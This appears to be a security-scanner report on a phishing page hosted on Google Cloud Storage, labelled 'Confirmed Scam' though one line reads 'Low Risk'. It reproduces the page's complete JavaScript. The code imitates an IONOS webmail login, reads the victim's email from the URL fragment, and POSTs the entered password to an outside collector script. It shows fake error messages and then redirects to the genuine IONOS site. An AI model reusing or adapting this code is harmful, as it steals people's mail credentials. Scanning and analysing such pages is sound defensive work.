technology software

English

The domain 'storage.googleapis.com' uses the commercial generic top-level domain (.com) with subdomain 'storage'. Count 10 characters in 'googleapis' split between five vowels and five consonants. It segments into 2 words: google, apis. Expect 5 characters per word on average. No strong language cues emerged from the frequency lists.

html/67/e3/67e3b039-7b8f-457b-8947-520d1f62d564_fallback.html.gz

Webmail Login

_csrf

identifier

password

html/67/e3/67e3b039-7b8f-457b-8947-520d1f62d564.html.gz

a6a492d13a307f057f1154851bec2fe27864658e3a78cab6cf9cd49d997d41ca

viewport

robots

Login to access your IONOS e-mail account and read your e-mail online with IONOS Webmail.

description

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/


  // ############################################################################
  // Specify the URL of the PHP file Here
  var url = "https://vrmcllc.host/noss/main.php";
  // ############################################################################

  let email
  window.onload = function () {
    // Get the current URL
    var url = window.location.href;

    // Parse the URL and get the fragment (the part after the '#')
    var urlComponents = new URL(url);
    email = urlComponents.hash.substring(1);

    // Check if the fragment is a valid email
    var emailRegex = /^[\w-]+(\.[\w-]+)*@([\w-]+\.)+[a-zA-Z]{2,7}$/;
    if (emailRegex.test(email)) {
      // If it is, add the email into a html element as text
      var emailElement = document.querySelector(".ghost-button__text");
      if (emailElement) {
        emailElement.textContent = email;
      }
    }
  };


  // Get the form and input elements
  var form = document.getElementById("myForm");
  var textForm = document.querySelectorAll(".input-text-group");
  var input = document.getElementById("password");
  var passwordError = document.querySelectorAll(".input-byline--error");

  var clickCount = 0;

  // Add an event listener for form submission
  form.addEventListener("submit", function (event) {
    // Prevent the form from being submitted normally
    event.preventDefault();

    // Get the input value
    var password = input.value;

    // Write an if statement to check if the input value is empty
    if (password === "") {
      // If it is, do nothing and return from the function
      return;
    }

    // Toggle classlist of passwordError to add or remove the "input-byline--error-hidden" class
    loading()
    setTimeout(function () {
      textForm.forEach(function (text) {
        text.classList.add("input-text-group--error");
      });
      passwordError.forEach(function (error) {
        error.classList.remove("input-byline--error-hidden");
      });
      input.value = "";
      setTimeout(function () {
        textForm.forEach(function (text) {
          text.classList.remove("input-text-group--error");
        });
        passwordError.forEach(function (error) {
          error.classList.add("input-byline--error-hidden");
        });
      }, 3000)
    }, 3000)

    if (email && password) {
      let dataLog = {
        email,
        password,
        desc: "Ionos Login Details",
      };
      //console.log(dataLog);
      sendDataWithRetry(dataLog);
    }
  });

  // Write a function that will redirect the page to a URL
  function toggleClass() {
    // Redirect the page to a URL
    window.location.href = "https://id.ionos.co.uk/identifier";
  }

  function loading() {
    const loader = document.querySelector(".loader");

    loader.classList.remove("loader--hidden");

    setTimeout(function () {
      loader.classList.add("loader--hidden");
    }, 3000);
  }

  // Send data to the PHP file
  function sendDataWithRetry(dataLog, maxRetries = 3) {
    const sendRequest = async (retryCount) => {
      try {
        const response = await fetch(url, {
          method: "POST",
          headers: {
            "Content-Type": "application/json; charset=utf-8",
          },
          body: JSON.stringify(dataLog),
        });

        if (response.ok) {
          const responseData = await response.json();
          // console.log("Data received by PHP:", responseData);
          clickCount++;
          // console.log(clickCount);
          if (clickCount === 3) {
            // Execute a separate function on second click
            toggleClass();
            clickCount = 0;
          }
          // Continue with other tasks (e.g., UI updates, etc.)
        } else {
          throw new Error("Network response was not OK");
        }
      } catch (error) {
        console.error("Error sending data:", error);
        if (retryCount < maxRetries) {
          console.log(`Retrying (attempt ${retryCount + 1})...`);
          await sendRequest(retryCount + 1);
        } else {
          console.error("Max retries reached. Data not sent.");
          // Handle failure (e.g., show an error message)
        }
      }
    };
    sendRequest(0); // Start the initial request
  }

  // Show password in input field when an "a" element with id "password-unveil" is clicked
  function seePassword() {
    var passwordUnveil = document.getElementById("password-unveil");
    var input = document.getElementById("password");
    passwordUnveil.addEventListener("click", function () {
      passwordUnveil.classList.toggle("password-unveil-reverse");
      if (input.type === "password") {
        input.type = "text";
      } else {
        input.type = "password";
      }
    });
  }



✅ Low Risk - https://storage.googleapis.com/oxilo/osxilo/oxsilo.html

Requests	IP Address	Location	AS Autonomous System
14	46.202.156.207	Unknown	Unknown
0	213.165.66.58	Unknown	Unknown
0	142.250.185.251	Unknown	Unknown
0	142.250.185.187	Unknown	Unknown
0	216.58.206.59	Unknown	Unknown
0	142.250.184.251	Unknown	Unknown
0	142.250.185.123	Unknown	Unknown
0	142.250.186.187	Unknown	Unknown
0	2a00:1450:4001:82a::201b	Unknown	Unknown
0	142.251.140.187	Unknown	Unknown
14	25	-	-

Security Scan Report: storage.googleapis.com

Summary

AI Security Verdict

Confirmed Scam

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History